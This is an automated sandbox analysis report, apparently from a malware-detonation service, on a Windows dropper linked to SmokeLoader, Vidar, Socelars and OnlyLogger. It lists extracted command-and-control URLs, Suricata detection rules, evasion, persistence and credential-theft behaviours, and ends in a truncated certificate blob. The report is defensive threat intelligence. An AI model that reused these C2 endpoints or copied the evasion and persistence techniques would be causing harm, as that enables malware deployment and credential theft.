onlylogger | b0de3b3eb79e5291dcd933e0e8231c90208e2e11e894500fb7df6487ba259ba9

Analysis

max time kernel
160s
max time network
170s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
08-03-2022 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

42c371e393e888b8ff2e0c2f24193ee9.exe
Size

229KB
MD5

42c371e393e888b8ff2e0c2f24193ee9
SHA1

7b04c28fd946374f76f6940ab7ce62ea5aadb85c
SHA256

b0de3b3eb79e5291dcd933e0e8231c90208e2e11e894500fb7df6487ba259ba9
SHA512

441f8a8f5aab639ce88b4f9c913a9a90647ef91dbcdd73362625d0733468f4752f7359cb72d2496a2eb43b19cb411c33d17c9422c04c19c20ee089df4ae8de8e

Score

10^/10

onlylogger smokeloader socelars vidar 937 backdoor discovery evasion loader persistence spyware stealer suricata trojan upx

Malware Config

Extracted

Family

socelars

https://sa-us-bucket.s3.us-east-2.amazonaws.com/asdhjk/

Extracted

Family

vidar

Version

50.5

Botnet

937

https://c.im/@sam3al

https://mas.to/@s4msalo

Attributes

profile_id
937

Extracted

Family

smokeloader

Version

2020

http://coralee.at/upload/

http://ducvietcao.com/upload/

http://biz-acc.ru/upload/

http://toimap.com/upload/

http://bbb7d.com/upload/

http://piratia-life.ru/upload/

http://curvreport.com/upload/

http://viagratos.com/upload/

http://mordo.ru/upload/

http://pkodev.net/upload/

rc4.i32

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\tnskCXTQ3t_OPZ1RlasU8Rsb.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\tnskCXTQ3t_OPZ1RlasU8Rsb.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\emQfv5j5sHglqR6n71_mRXaz.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\emQfv5j5sHglqR6n71_mRXaz.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
Looks for VirtualBox Guest Additions in registry 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

OnlyLogger Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4076-182-0x0000000002140000-0x0000000002184000-memory.dmp	family_onlylogger
behavioral2/memory/4076-183-0x0000000000400000-0x0000000000505000-memory.dmp	family_onlylogger
behavioral2/memory/4984-278-0x0000000000400000-0x0000000000505000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1780-158-0x00000000021E0000-0x000000000228C000-memory.dmp	family_vidar
behavioral2/memory/1780-160-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow pid process

209 1928 rundll32.exe
217 3208 rundll32.exe
Downloads MZ/PE file

flow	pid	process
209	1928	rundll32.exe
217	3208	rundll32.exe

Executes dropped EXE 54 IoCs

Processes:

p8QVXQKdFAF7Z4pkLQV3LbU7.exe9j_wXMaNSottrO7JtYW1aAtP.exexWLRw6KAtqAoF3uYufezyU9I.exeaSRMIbDkVo8osmoJWbe0dJbt.exe5KrMMzV4lYg34LPlN2TKrre2.exezIjziXqTZtL6TVi_WXzxttya.exezwCiq6ExDDwgz0LzeWEbVyZn.exeFSiutCi_C9g5l_U_qzWouquE.exeDDVvwjLb77LpKqM9KFJTxOqm.exeo4jcM6LrerPSL5EwekSwbTN2.exenbSiITdIUKyZbJtbvZkILKqa.exe_Oo_LwtjZ89hfSyHPy6yIhwe.exetnskCXTQ3t_OPZ1RlasU8Rsb.exeR9vbL0ypLAopLUN_Ov5e85_v.exeFFXAiRNs4EldPaihY1sTKXkb.execdRFSbaD5wfOwUq5OD8Y_bgN.exeaTtFt7lCS6ZI8vNMzQ_AnQdm.exej983aU7mLXKldwRB_TAPSL62.exeJ7TLo1ZDOHiBpIRDeZAWJWfZ.exeDILH6y1J6d67_qFohQhl5yIk.exeInstall.exedMKKX4fKZX2_x4WEKOrxzGZG.exeInstall.exe8Dk2cGAGxzYagX5HsEr4_IL3.exeaCtYcV4VDEOfv82XjVcqXOye.exeZ0uFzmBxFOrSVAfZnDDzjB2y.exefind.exeffC70C1mCgsjIf9jnUuOSgMt.exefnw17a1dYyA_cdbCy40vgDbb.exe6ZxZzhUOKPIQfGM9V9kGCUi0.exeInstall.exeInstall.exeIK8j4iKdiNSim32AabSudMWC.exeTrdngAnlzr2249.exedengbing.exeSharkSoftSetup36667.exepo50.exeEI85I.exezhangj.exeJ38I7.exetvstream17.exebcleaner.exeE67I8.exejg7_7wjg.exeJF713.exeAccostarmi.exe.pifJ1L4D.exeJ1L4D7H7BH06JG0.exezhangj.exesetup.exed87a6c1e-4c53-41df-8762-ff0834c975b2.exesiww1049.exe3ea14c16-a9d9-4d2e-acbe-4576a31ed49d.exeinst200.exe

pid	process
2144	p8QVXQKdFAF7Z4pkLQV3LbU7.exe
4080	9j_wXMaNSottrO7JtYW1aAtP.exe
4076	xWLRw6KAtqAoF3uYufezyU9I.exe
1780	aSRMIbDkVo8osmoJWbe0dJbt.exe
1840	5KrMMzV4lYg34LPlN2TKrre2.exe
2152	zIjziXqTZtL6TVi_WXzxttya.exe
2904	zwCiq6ExDDwgz0LzeWEbVyZn.exe
3568	FSiutCi_C9g5l_U_qzWouquE.exe
2528	DDVvwjLb77LpKqM9KFJTxOqm.exe
2720	o4jcM6LrerPSL5EwekSwbTN2.exe
2948	nbSiITdIUKyZbJtbvZkILKqa.exe
2656	_Oo_LwtjZ89hfSyHPy6yIhwe.exe
3920	tnskCXTQ3t_OPZ1RlasU8Rsb.exe
3236	R9vbL0ypLAopLUN_Ov5e85_v.exe
3392	FFXAiRNs4EldPaihY1sTKXkb.exe
2724	cdRFSbaD5wfOwUq5OD8Y_bgN.exe
756	aTtFt7lCS6ZI8vNMzQ_AnQdm.exe
2248	j983aU7mLXKldwRB_TAPSL62.exe
1412	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
1856	DILH6y1J6d67_qFohQhl5yIk.exe
1532	Install.exe
2632	dMKKX4fKZX2_x4WEKOrxzGZG.exe
4156	Install.exe
4292	8Dk2cGAGxzYagX5HsEr4_IL3.exe
4972	aCtYcV4VDEOfv82XjVcqXOye.exe
4984	Z0uFzmBxFOrSVAfZnDDzjB2y.exe
5092	find.exe
5116	ffC70C1mCgsjIf9jnUuOSgMt.exe
4132	fnw17a1dYyA_cdbCy40vgDbb.exe
3224	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
2684	Install.exe
4892	Install.exe
2628	IK8j4iKdiNSim32AabSudMWC.exe
3488	TrdngAnlzr2249.exe
4804	dengbing.exe
832	SharkSoftSetup36667.exe
4172	po50.exe
4232	EI85I.exe
4384	zhangj.exe
2272	J38I7.exe
4632	tvstream17.exe
4272	bcleaner.exe
2968	E67I8.exe
4656	jg7_7wjg.exe
4128	JF713.exe
3164	Accostarmi.exe.pif
3012	J1L4D.exe
1132	J1L4D7H7BH06JG0.exe
4796	zhangj.exe
4084	setup.exe
4992	d87a6c1e-4c53-41df-8762-ff0834c975b2.exe
5072	siww1049.exe
2988	3ea14c16-a9d9-4d2e-acbe-4576a31ed49d.exe
2688	inst200.exe

Looks for VMWare Tools registry key 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\FSiutCi_C9g5l_U_qzWouquE.exe	upx
C:\Users\Admin\Pictures\Adobe Films\FSiutCi_C9g5l_U_qzWouquE.exe	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exeInstall.exe5KrMMzV4lYg34LPlN2TKrre2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5KrMMzV4lYg34LPlN2TKrre2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5KrMMzV4lYg34LPlN2TKrre2.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

aSRMIbDkVo8osmoJWbe0dJbt.exeaCtYcV4VDEOfv82XjVcqXOye.exeSharkSoftSetup36667.exe42c371e393e888b8ff2e0c2f24193ee9.exe9j_wXMaNSottrO7JtYW1aAtP.exezwCiq6ExDDwgz0LzeWEbVyZn.exeInstall.exezIjziXqTZtL6TVi_WXzxttya.exedMKKX4fKZX2_x4WEKOrxzGZG.exeInstall.exeIK8j4iKdiNSim32AabSudMWC.exezhangj.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	aSRMIbDkVo8osmoJWbe0dJbt.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	aCtYcV4VDEOfv82XjVcqXOye.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	SharkSoftSetup36667.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	42c371e393e888b8ff2e0c2f24193ee9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	9j_wXMaNSottrO7JtYW1aAtP.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	zwCiq6ExDDwgz0LzeWEbVyZn.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	zIjziXqTZtL6TVi_WXzxttya.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	dMKKX4fKZX2_x4WEKOrxzGZG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	IK8j4iKdiNSim32AabSudMWC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	zhangj.exe

Loads dropped DLL 4 IoCs

Processes:

aSRMIbDkVo8osmoJWbe0dJbt.exerundll32.exe

pid process

1780 aSRMIbDkVo8osmoJWbe0dJbt.exe
1780 aSRMIbDkVo8osmoJWbe0dJbt.exe
4664 rundll32.exe
4664 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1780	aSRMIbDkVo8osmoJWbe0dJbt.exe
1780	aSRMIbDkVo8osmoJWbe0dJbt.exe
4664	rundll32.exe
4664	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

JF713.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	JF713.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

34 ipinfo.io
35 ipinfo.io
137 ipinfo.io
138 ipinfo.io
155 ipinfo.io

flow	ioc
34	ipinfo.io
35	ipinfo.io
137	ipinfo.io
138	ipinfo.io
155	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

5KrMMzV4lYg34LPlN2TKrre2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	5KrMMzV4lYg34LPlN2TKrre2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	5KrMMzV4lYg34LPlN2TKrre2.exe

Drops file in System32 directory 2 IoCs

Processes:

Install.exeInstall.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

TrdngAnlzr2249.exepo50.exeEI85I.exeJ38I7.exeE67I8.exeJF713.exejg7_7wjg.exe

pid process

3488 TrdngAnlzr2249.exe
4172 po50.exe
4232 EI85I.exe
2272 J38I7.exe
2968 E67I8.exe
4128 JF713.exe
4656 jg7_7wjg.exe

pid	process
3488	TrdngAnlzr2249.exe
4172	po50.exe
4232	EI85I.exe
2272	J38I7.exe
2968	E67I8.exe
4128	JF713.exe
4656	jg7_7wjg.exe

Drops file in Program Files directory 2 IoCs

Processes:

9j_wXMaNSottrO7JtYW1aAtP.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	9j_wXMaNSottrO7JtYW1aAtP.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	9j_wXMaNSottrO7JtYW1aAtP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4312	2948	WerFault.exe	nbSiITdIUKyZbJtbvZkILKqa.exe
4224	3236	WerFault.exe	R9vbL0ypLAopLUN_Ov5e85_v.exe
4344	2720	WerFault.exe	o4jcM6LrerPSL5EwekSwbTN2.exe
4112	3236	WerFault.exe	R9vbL0ypLAopLUN_Ov5e85_v.exe
3316	4076	WerFault.exe	xWLRw6KAtqAoF3uYufezyU9I.exe
2344	4076	WerFault.exe	xWLRw6KAtqAoF3uYufezyU9I.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

fnw17a1dYyA_cdbCy40vgDbb.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fnw17a1dYyA_cdbCy40vgDbb.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fnw17a1dYyA_cdbCy40vgDbb.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fnw17a1dYyA_cdbCy40vgDbb.exe

Checks processor information in registry 2 TTPs 48 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

J7TLo1ZDOHiBpIRDeZAWJWfZ.exe6ZxZzhUOKPIQfGM9V9kGCUi0.exeaSRMIbDkVo8osmoJWbe0dJbt.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	aSRMIbDkVo8osmoJWbe0dJbt.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	aSRMIbDkVo8osmoJWbe0dJbt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	6ZxZzhUOKPIQfGM9V9kGCUi0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6ZxZzhUOKPIQfGM9V9kGCUi0.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2600 schtasks.exe
3488 schtasks.exe
3012 schtasks.exe
4816 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4308 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4760 tasklist.exe
1196 tasklist.exe

pid	process
2600	schtasks.exe
3488	schtasks.exe
3012	schtasks.exe
4816	schtasks.exe

pid	process
4308	timeout.exe

pid	process
4760	tasklist.exe
1196	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4360 taskkill.exe
4592 taskkill.exe
2608 taskkill.exe

pid	process
4360	taskkill.exe
4592	taskkill.exe
2608	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

tnskCXTQ3t_OPZ1RlasU8Rsb.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc